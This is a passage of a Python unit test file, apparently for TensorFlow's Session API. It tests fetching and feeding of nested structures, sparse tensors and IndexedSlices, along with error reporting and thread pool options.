with session.Session(config=config_pb) as s:
inp = constant_op.constant(10.0, name='W1')
results = s.run([inp])
self.assertAllEqual([10.0], results)
pool = config_pb.session_inter_op_thread_pool.add()
pool.num_threads = 1
with session.Session(config=config_pb) as s:
inp = constant_op.constant(20.0, name='W2')
results = s.run([inp])
self.assertAllEqual([20.0], results)
pool = config_pb.session_inter_op_thread_pool.add()
pool.num_threads = 1
pool.global_name = 't1'
run_options = config_pb2.RunOptions()
run_options.inter_op_thread_pool = (
len(config_pb.session_inter_op_thread_pool) - 1)
with session.Session(config=config_pb) as s:
inp = constant_op.constant(30.0, name='W2')
results = s.run([inp], options=run_options)
self.assertAllEqual([30.0], results)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
def exc_predicate(e):
return (e.op == c.op and e.op._original_op == b.op and
e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchNone(self):
with session.Session() as s:
a = constant_op.constant(1.0)
with self.assertRaises(TypeError):
s.run(None)
with self.assertRaises(TypeError):
s.run([None])
with self.assertRaises(TypeError):
s.run({'b': None})
with self.assertRaises(TypeError):
s.run({'a': a, 'b': None})
def testFetchSingleton(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
tensor_runner = sess.make_callable(a)
res = tensor_runner()
self.assertEqual(42.0, res)
op_runner = sess.make_callable(a.op)
res = op_runner()
self.assertEqual(None, res)
def testFetchSingletonByName(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a.name)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchList(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
v = variables.Variable([54.0])
assign = v.assign([63.0])
res = sess.run([a, b, c, a.name, assign.op])
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
list_runner = sess.make_callable([a, b, c, a.name, assign.op])
res = list_runner()
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
def testFetchTuple(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run((a, b, c, a.name))
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
tuple_runner = sess.make_callable((a, b, c, a.name))
res = tuple_runner()
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
def testFetchNamedTuple(self):
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
# pylint: enable=invalid-name
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(ABC(a, b, c))
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
namedtuple_runner = sess.make_callable(ABC(a, b, c))
res = namedtuple_runner()
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
def testFetchDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run({'a': a, 'b': b, 'c': c})
self.assertTrue(isinstance(res, dict))
self.assertEqual(42.0, res['a'])
self.assertEqual(None, res['b'])
self.assertEqual(44.0, res['c'])
def testFetchOrderedDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(collections.OrderedDict([(3, a), (2, b), (1, c)]))
self.assertTrue(isinstance(res, collections.OrderedDict))
self.assertEqual([3, 2, 1], list(res.keys()))
self.assertEqual(42.0, res[3])
self.assertEqual(None, res[2])
self.assertEqual(44.0, res[1])
@test_util.run_v1_only('b/120545219')
def testFetchAttrs(self):
if attr is None:
self.skipTest('attr module is unavailable.')
@attr.s
class SampleAttr(object):
field1 = attr.ib()
field2 = attr.ib()
val1 = np.array([1.2, 3.4, 5.6])
val2 = np.array([[1, 2], [4, 3]])
val3 = np.array([10, 20, 30])
t1 = constant_op.constant(val1)
t2 = constant_op.constant(val2)
sample = SampleAttr(t1, t2)
with session.Session() as sess:
result = sess.run(sample)
self.assertIsInstance(result, SampleAttr)
self.assertAllEqual(val1, result.field1)
self.assertAllEqual(val2, result.field2)
result = sess.run(sample, feed_dict={sample.field1: val3})
self.assertIsInstance(result, SampleAttr)
self.assertAllEqual(val3, result.field1)
self.assertAllEqual(val2, result.field2)
@test_util.run_v1_only('b/120545219')
def testFetchNestedAttrs(self):
if attr is None:
self.skipTest('attr module is unavailable.')
@attr.s
class SampleAttr(object):
field0 = attr.ib()
field1 = attr.ib()
v1 = 10
v2 = 20
v3 = np.float32(1.2)
v4 = np.float32(3.4)
v5 = np.float64(100.001)
v6 = np.float64(-23.451)
arr1 = np.array([1.2, 6.7, 3.4])
arr2 = np.array([7, 11, 3])
sample = SampleAttr(
SampleAttr(
SampleAttr(constant_op.constant(v1), constant_op.constant(v2)),
SampleAttr(constant_op.constant(arr1), constant_op.constant(arr2))),
{'A': SampleAttr(constant_op.constant(v3), constant_op.constant(v4)),
'B': [SampleAttr(constant_op.constant(v5), constant_op.constant(v6))]})
with session.Session() as sess:
result = sess.run(sample)
self.assertIsInstance(result, SampleAttr)
self.assertIsInstance(result.field0, SampleAttr)
self.assertIsInstance(result.field0.field0, SampleAttr)
self.assertIsInstance(result.field0.field1, SampleAttr)
self.assertIsInstance(result.field0.field1.field0, np.ndarray)
self.assertAllEqual(arr1, result.field0.field1.field0)
self.assertIsInstance(result.field0.field1.field1, np.ndarray)
self.assertAllEqual(arr2, result.field0.field1.field1)
self.assertIsInstance(result.field1, dict)
self.assertIn('A', result.field1)
self.assertIn('B', result.field1)
self.assertIsInstance(result.field1['A'], SampleAttr)
self.assertAllEqual(
[v3, v4],
[result.field1['A'].field0, result.field1['A'].field1])
self.assertIsInstance(result.field1['B'], list)
self.assertEqual(1, len(result.field1['B']))
self.assertIsInstance(result.field1['B'][0], SampleAttr)
self.assertAllEqual(
[v5, v6],
[result.field1['B'][0].field0, result.field1['B'][0].field1])
def testFetchNestingEmptyOneLevel(self):
with session.Session() as sess:
a_val = 11.0
a = constant_op.constant(a_val)
res = sess.run([[], tuple(), {}])
self.assertTrue(isinstance(res, list))
self.assertEqual(3, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
res = sess.run([[], tuple(), {}, a])
self.assertTrue(isinstance(res, list))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
self.assertEqual(a_val, res[3])
def testFetchNestingOneLevel(self):
with session.Session() as sess:
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
# pylint: enable=invalid-name
a_val = 42.0
b_val = None
c_val = 44.0
a = constant_op.constant(a_val)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(c_val)
# List of lists, tuples, namedtuple, and dict
res = sess.run([[a, b, c], (a, b, c),
ABC(a=a, b=b, c=c), {
'a': a.name,
'c': c,
'b': b
}])
self.assertTrue(isinstance(res, list))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Tuple of lists, tuples, namedtuple, and dict
res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c), {
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, tuple))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Namedtuple of lists, tuples, namedtuples, and dict
res = sess.run(
DEFG(
d=[a, b, c],
e=(a, b, c),
f=ABC(a=a.name, b=b, c=c),
g={
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, DEFG))
self.assertTrue(isinstance(res.d, list))
self.assertEqual(3, len(res.d))
self.assertEqual(a_val, res.d[0])
self.assertEqual(b_val, res.d[1])
self.assertEqual(c_val, res.d[2])
self.assertTrue(isinstance(res.e, tuple))
self.assertEqual(3, len(res.e))
self.assertEqual(a_val, res.e[0])
self.assertEqual(b_val, res.e[1])
self.assertEqual(c_val, res.e[2])
self.assertTrue(isinstance(res.f, ABC))
self.assertEqual(a_val, res.f.a)
self.assertEqual(b_val, res.f.b)
self.assertEqual(c_val, res.f.c)
self.assertTrue(isinstance(res.g, dict))
self.assertEqual(3, len(res.g))
self.assertEqual(a_val, res.g['a'])
self.assertEqual(b_val, res.g['b'])
self.assertEqual(c_val, res.g['c'])
# Dict of lists, tuples, namedtuples, and dict
res = sess.run({
'd': [a, b, c],
'e': (a, b, c),
'f': ABC(a=a, b=b, c=c),
'g': {
'a': a.name,
'c': c,
'b': b
}
})
self.assertTrue(isinstance(res, dict))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res['d'], list))
self.assertEqual(3, len(res['d']))
self.assertEqual(a_val, res['d'][0])
self.assertEqual(b_val, res['d'][1])
self.assertEqual(c_val, res['d'][2])
self.assertTrue(isinstance(res['e'], tuple))
self.assertEqual(3, len(res['e']))
self.assertEqual(a_val, res['e'][0])
self.assertEqual(b_val, res['e'][1])
self.assertEqual(c_val, res['e'][2])
self.assertTrue(isinstance(res['f'], ABC))
self.assertEqual(a_val, res['f'].a)
self.assertEqual(b_val, res['f'].b)
self.assertEqual(c_val, res['f'].c)
self.assertTrue(isinstance(res['g'], dict))
self.assertEqual(3, len(res['g']))
self.assertEqual(a_val, res['g']['a'])
self.assertEqual(b_val, res['g']['b'])
self.assertEqual(c_val, res['g']['c'])
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_dict['b'])
self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
# Test nested structures
results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_nested_list[0][0][1])
self.assertAllEqual(results_with_nested_list[0][0][0],
results_with_nested_list[1])
self.assertAllEqual(results_with_nested_list[1],
results_with_nested_list[2][0])
self.assertAllEqual(results_with_nested_list[0][0][1],
results_with_nested_list[0][1])
self.assertAllEqual(results_with_nested_list[0][1],
results_with_nested_list[2][1])
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Dict fetch
xy = s.run({'xy': tf_xy})['xy']
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Nested list fetch
xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
self.assertEqual(scalar, type(xy[0][0][0]))
self.assertEqual(scalar, type(xy[1]))
self.assertEqual(scalar, type(xy[2][0]))
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
constant_op.constant(indices), constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Dict fetch (single value), use as tuple
indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch (list value), use as tuple
(indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch, use as SparseTensorValue
sp_out = s.run({'sp': sp})['sp']
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Nested list fetch use as tuple
sp_out = s.run([[[sp]], sp])
indices_out, values_out, shape_out = sp_out[0][0][0]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
indices_out, values_out, shape_out = sp_out[1]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Nested list fetch, use as SparseTensorValue
sp_out = s.run([[[sp]], sp])
self.assertAllEqual(sp_out[0][0][0].indices, indices)
self.assertAllEqual(sp_out[0][0][0].values, values)
self.assertAllEqual(sp_out[0][0][0].dense_shape, shape)
self.assertAllEqual(sp_out[1].indices, indices)
self.assertAllEqual(sp_out[1].values, values)
self.assertAllEqual(sp_out[1].dense_shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with tuple, fetch sp directly
sp_out = s.run(sp, {sp: (indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
# Feed SparseTensorValue and fetch sp directly.
sp_out = s.run(sp, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
def testFeedSparsePlaceholder(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderPartialShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
shape=[None, 9, 2], dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderConstantShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
dtype=np.float32, shape=shape, name='placeholder1')
self.assertAllEqual(sp.dense_shape.eval(session=s), shape)
self.assertAllEqual(tensor_util.constant_value(sp.shape), shape)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: (values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)), None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: (values, indices)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
